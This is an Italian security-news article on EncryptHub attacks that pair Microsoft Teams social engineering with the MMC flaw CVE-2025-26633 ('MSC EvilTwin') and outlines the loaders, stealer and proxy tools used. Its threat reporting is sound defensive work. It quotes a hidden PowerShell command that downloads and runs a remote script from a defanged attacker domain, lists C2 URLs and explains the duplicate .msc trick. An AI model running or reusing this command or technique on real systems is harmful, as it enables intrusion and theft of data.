Red Hot Cyber
Sicurezza Informatica, Notizie su Cybercrime e Analisi Vulnerabilità
Il team di ricerca di Trustwave SpiderLabs ha identificato una nuova ondata di attacchi EncryptHub che combinano l’errore umano e lo sfruttamento di una vulnerabilità nella Microsoft Management Console. Gli operatori si spacciano per personale di supporto, contattano il personale tramite Microsoft Teams e poi convincono il “cliente” ad aprire l’accesso remoto ed eseguire una serie di comandi, per poi distribuire il payload del bug CVE-2025-26633, nota come MSC EvilTwin.
Parallelamente, il gruppo utilizza canali di distribuzione non standard, tra cui la piattaforma di supporto Brave, il che complica il filtraggio del traffico e l’analisi degli incidenti. I report riportano anche altri nomi dello stesso team: LARVA-208 e Water Gamayun; in precedenza, il gruppo era stato associato ad attacchi contro sviluppatori Web3 e abusi della piattaforma Steam e, a febbraio, erano 618 le organizzazioni compromesse in tutto il mondo.
Il primo passo è l’ingegneria sociale . La vittima riceve una richiesta Teams da un “addetto IT”, dopodiché l’interlocutore offre insistentemente di avviare una sessione remota e “controllare le impostazioni“. Una volta stabilita la sessione, sulla macchina viene eseguita una riga come questa:
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command “Invoke-RestMethod -Uri ‘hxxps://cjhsbam[.]com/payload/runner.ps1’ | Invoke-Expression”
Questa chiamata scarica ed esegue lo script runner.ps1, che prepara un trampolino di lancio per sfruttare la vulnerabilità MMC.
Poi arriva il trucco con i file .msc doppi. Il loader crea due file di console con lo stesso nome: una copia “pulita” viene posizionata nella directory prevista e una copia dannosa viene posizionata nel percorso MUIPath, solitamente la directory en-US. Quando viene avviato lo snap-in legittimo, viene visualizzato il processo mmc.exe e, a causa del bug MSC EvilTwin, cerca prima il file con lo stesso nome in MUIPath. Di conseguenza, il sistema rileva il “mirror” da en-US ed esegue il codice degli aggressori. Sebbene la falla sia stata pubblicamente descritta come zero-day nel marzo 2025, campioni di tali file sono stati riscontrati in attacchi attivi già a febbraio; esiste una patch, ma la ricezione funziona ancora sulle stazioni non patchate.
Dopo aver disposto i doppi, runner.ps1 modifica il contenuto dello snap-in dannoso: il segnaposto htmlLoaderUrl viene sostituito con l’indirizzo del nodo di comando e controllo di EncryptHub, una stringa del tipo hxxps://cjhsbam[.]com/payload/build[.]ps1. Dopo aver ricevuto il collegamento, .msc esegue la fase successiva.
Lo script build.ps1 raccoglie i “finger” di sistema e li invia a C2, registra il meccanismo di esecuzione automatica, gestisce il canale di comunicazione e attende l’esecuzione dell’attività. I comandi vengono ricevuti in forma crittografata (AES), decrittografati localmente ed eseguiti direttamente sul nodo tramite Invoke-Expression. Tra i moduli tipici c’è linfostealer PowerShell Fickle Stealer, che estrae file sensibili, informazioni sull’ambiente e dati del portafoglio crittografico.
Durante l’indagine, sono emersi ulteriori strumenti Go, con i quali gli operatori stanno gradualmente sostituendo gli script di PowerShell. Uno di questi, SilentCrystal, replica la logica del bootloader, ma è compresso in un binario nativo. Innanzitutto, viene creata una cartella di pseudo-sistema “C:WindowsSystem32” con uno spazio dopo la parola Windows, che copia visivamente la directory reale e confonde gli strumenti di sicurezza. Quindi, il campione invia un POST al server di controllo con una “chiave API” hard-coded e un nome file casuale con estensione .zip; in risposta, viene inviato un collegamento legittimo al supporto Brave.
Ai principianti non è consentito caricare allegati su questo sito, il che significa che EncryptHub ha un account con diritti di caricamento. L’archivio dal supporto Brave viene scaricato e decompresso, dopodiché il segnaposto {URI} in WF.msc viene sostituito con l’indirizzo del centro di comando. Successivamente, viene avviato lo standard .msc e, grazie a CVE-2025-26633 , la console rileva la sostituzione dalla directory “false”, eseguendo il codice richiesto.
Un’altra scoperta interessante è un “proxy bookmark” in Go con supporto SOCKS5. Senza parametri, si avvia come client, si connette all'”hosting” degli aggressori utilizzando i dettagli hardcoded nel binario e devia il traffico in un tunnel. Esiste anche una modalità server: viene caricato un file con i dati di autenticazione, viene generato automaticamente un certificato TLS autofirmato (il campo Common Name contiene la riga Reverse Socks e il nome DNS è localhost), dopodiché il processo inizia ad accettare più connessioni, parallelizzando l’elaborazione tramite goroutine. Quando viene stabilita una connessione, l’agente accede a Telegram con lo stato “start”, dove sostituisce il nome utente, il dominio dalla variabile d’ambiente USERDOMAIN, il risultato della verifica dei diritti amministrativi tramite una chiamata di sessione di rete, nonché l’IP pubblico, il geotag e il provider su richiesta a https://ipinfo.io/json . L’analisi dell’infrastruttura ha mostrato richieste di payload su hxxps://safesurf.fastdomain-uoemathhvq.workers.dev/payload/pay[.]ps1, un altro tassello nel quadro di C2.
Ti è piaciuto questo articolo? Ne stiamo discutendo nella nostra Community su LinkedIn, Facebook e Instagram. Seguici anche su Google News, per ricevere aggiornamenti quotidiani sulla sicurezza informatica o Scrivici se desideri segnalarci notizie, approfondimenti o contributi da pubblicare.
Innovazione
Cybercrime
Vulnerabilità
Innovazione
Cyber Italia